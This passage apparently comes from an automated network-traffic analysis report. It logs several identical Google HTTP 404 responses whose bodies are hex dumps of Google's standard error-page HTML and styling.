70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:11:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 